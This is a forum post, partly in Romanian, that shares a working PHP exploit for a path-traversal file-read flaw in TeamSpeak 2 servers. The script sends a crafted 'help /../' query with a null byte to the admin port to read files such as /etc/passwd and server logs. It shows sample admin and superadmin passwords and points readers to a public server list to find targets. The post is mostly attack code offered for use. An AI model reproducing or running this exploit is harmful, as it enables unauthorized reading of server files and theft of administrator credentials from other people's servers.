Jump to content
c0x

TeamSpeak Servers <= 2.0.23.17 remote read file vuln

By c0x, in Exploituri

Recommended Posts

c0x Newbie

c0x

Posted
Posted 

<?php
// teamspeak server <= 2.0.23.17 remote read file vulnerability
// bug found and exploit write by c411k
// [url]http://www.heise-online.co.uk/security/Vulnerability-in-TeamSpeak-2-server--/news/93734[/url] zazhali ploent svolo4i!!
// tested on win ts2_server_rc2_202317, ts2_server_rc2_20201.exe
// grats all [url]https://forum.antichat.ru[/url]
// use [url]http://localhost/ts_xek.php[/url]
// 10.01.09

error_reporting(0);
@ini_set("max_execution_time",0);
@ini_set('output_buffering',0);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
@ob_implicit_flush(1);

header("Content-Type: text/html; charset=utf-8\r\n");
header("Pragma: no-cache");

function check_ver($site, $xek, $port)
{
    $url = fsockopen("$site", "$port", $errno, $errstr, 22);
    $send_pac = "$xek\r\n\r\n";
    fputs($url, $send_pac);
    $s = '';

    while (!feof($url) and strpos(implode($s), 'OK') === false)
    {
        $s[] = fgets($url, 1028);
    }
    fclose($url);
    return implode($s);
}

function html()
{
    if (isset($_POST['file']))
        $file = $_POST['file'];
    else $file = '../../../../../etc/passwd';
    echo 
    '<pre><form action="'.$_SERVER['PHP_SELF'].'?go_fuck" method="post">
    <input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" name="parampampam" type="submit" value=" ?read file...?">
    <input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" name="check_ver" type="submit" value=" ?check_version?"><br>
    <input style="background-color: #31333B; color: #B9B9BD;" name="hostname" value="localhost"><font color="#B9B9BD"> ?¬ teamspeak hostname or ip, for expamle "ts.antichat.ru"
    <input style="background-color: #31333B; color: #B9B9BD;" name="port" value="51234"><font color="#B9B9BD"> ?¬ port to TCQquery admin, default 51234
    <input style="background-color: #31333B; color: #B9B9BD;" name="file" value="'.$file.'"><font color="#B9B9BD">?¬ file to read.';
}

function info()
{
    echo
    '<br>
    for example: 
    server.log
    server.dbs
    ../../../../../boot.ini
    ../../../../../etc/passwd
    ../../../../../usr/local/apache/conf/httpd.conf etc.
    brain on 

    admin and superadmin passwords you can see in server.log or server.dbs. but in windows i can\'t read this files.

    <textarea style="background-color: #31333B; color: #B9B9BD;" name="zz" cols=90 rows=16>---------------------------------------------------------------
-------------- log started at 10-01-09 00:24 -------------
---------------------------------------------------------------
10-01-09 00:24:28,ALL,Info,server,    Server init initialized
10-01-09 00:24:28,ALL,Info,server,    Server version: 2.0.20.1 Win32
10-01-09 00:24:28,WARNING,Info,SQL,    created table ts2_servers
10-01-09 00:24:28,WARNING,Info,SQL,    created table ts2_server_privileges
10-01-09 00:24:28,WARNING,Info,SQL,    created table ts2_channels
10-01-09 00:24:28,WARNING,Info,SQL,    created table ts2_channel_privileges
10-01-09 00:24:28,WARNING,Info,SQL,    created table ts2_clients
10-01-09 00:24:28,WARNING,Info,SQL,    created table ts2_bans
10-01-09 00:24:28,ALL,Info,server,    Starting VirtualServer id:1 with port:8767
10-01-09 00:24:28,WARNING,Info,SERVER,    Default VirtualServer created
10-01-09 00:24:28,WARNING,Info,SERVER,    admin account info: username: admin password: kcqy8y
10-01-09 00:24:28,WARNING,Info,SERVER,    superadmin account info: username: superadmin password: e7em45
10-01-09 00:24:29,ALL,Info,server,    Server init finished</textarea></form>';
}

function head()
{
    echo '<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>xek_teamspeak_2.0.19.50</title>
<style>
<!--
A:link {COLOR: #B9B9BD; TEXT-DECORATION: none}
A:visited {COLOR: #B9B9BD; TEXT-DECORATION: none}
A:active {COLOR: #228B22; TEXT-DECORATION: none}
A:hover {COLOR: #E7E7EB; TEXT-DECORATION: underline}
BODY
{
    margin="5";
    FONT-WEIGHT: normal; 
    COLOR: #B9B9BD; 
    BACKGROUND: #44474F; 
    FONT-FAMILY: Courier new, Courier, Verdana, Arial, Helvetica, sans-serif; 
}

-->
</style>
</head>
<body>';
}

head();


if (!$_GET)
{
    html();
    info();
}

if (isset($_GET['go_fuck']))
{
    $hostname = $_POST['hostname'];
    $file = $_POST['file'];
    $port = $_POST['port'];

    if (isset($_POST['check_ver']))
    {
        echo '<pre>'.check_ver($hostname, 'ver', $port);

    }

    if (isset($_POST['parampampam']))
    {
        echo '<textarea style="background-color: #31333B; color: #B9B9BD;" name="zz" cols=90 rows=16>'.check_ver($hostname, 'help /../'.$file."\0", $port).'</textarea>';
        html();

    }
}

?>

Use:

http://localhost/ts_xek.php

Servere gasiti pe:

http://www.tsviewer.com

E vechi.. dar daca nu aveti ce face e tocmai bun :P

Have fun

____________________________

Source: https://forum.antichat.ru

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...